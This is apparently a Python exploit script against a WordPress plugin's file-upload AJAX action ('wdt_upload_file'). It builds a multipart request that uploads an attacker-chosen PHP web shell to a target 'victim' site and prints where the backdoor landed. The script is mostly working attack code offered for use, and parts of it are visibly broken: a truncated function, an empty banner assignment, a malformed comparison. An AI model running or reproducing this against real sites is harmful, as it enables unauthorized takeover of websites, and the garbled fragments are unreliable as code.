import urllib, urllib2, sys, re
import optparse
import os, os.path
def checkurl(url):
sys.exit( 1 )
else :
return url
def checkfile( file ):
if not os.path.isfile( file ) and not os.access( file , os.R_OK):
print '[X] ' + file + ' file is missing or not readable'
sys.exit( 1 )
else :
return file
def create_body_sh3ll_upl04d(payloadname):
getfields = dict ()
payloadcontent = open (payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append( '--' + LIMIT)
L.append( 'Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append( '--' + LIMIT)
L.append( 'Content-Disposition: form-data; name="%s"; filename="%s"' % ( 'files[]' , payloadname))
L.append( 'Content-Type: application/force-download' )
L.append('')
L.append(payloadcontent)
L.append( '--' + LIMIT + '--' )
L.append('')
body = CRLF.join(L)
return body
banner =
commandList = optparse.OptionParser( 'usage: %prog -t URL -f FILENAME.PHP [--timeout sec]' )
commandList.add_option( '-t' , '--target' , action = "store" ,
help = "Insert TARGET URL: http[s]://www.victim.com[:PORT]" ,
)
commandList.add_option( '-f' , '--file' , action = "store" ,
help = "Insert file name, ex: shell.php" ,
)
commandList.add_option( '--timeout' , action = "store" , default = 10 , type = "int" ,
help = "[Timeout Value] - Default 10" ,
)
options, remainder = commandList.parse_args()
if not options.target or not options. file :
print (banner)
commandList.print_help()
sys.exit( 1 )
payloadname = checkfile(options. file )
host = checkurl(options.target)
timeout = options.timeout
print (banner)
url_wpdatatab_upload = host + '/wp-admin/admin-ajax.php?action=wdt_upload_file'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
bodyupload = create_body_sh3ll_upl04d(payloadname)
headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' ,
'content-type' : content_type,
'content-length' : str ( len (bodyupload)) }
try :
req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers)
response = urllib2.urlopen(req)
read = response.read()
if "error" in read or read = = "0" :
print ( "[X] Upload Failed :(" )
else :
backdoor_location = re. compile ( '\"url\":\"(.*?)\",\"' ).search(read).group( 1 )
print ( "[!] Shell Uploaded" )
print ( "[!] Location: " + backdoor_location.replace( "\\"," "))
except urllib2.HTTPError as e:
print ( "[X] Http Error: " + str (e))
except urllib2.URLError as e:
print ( "[X] Connection Error: " + str (e))
|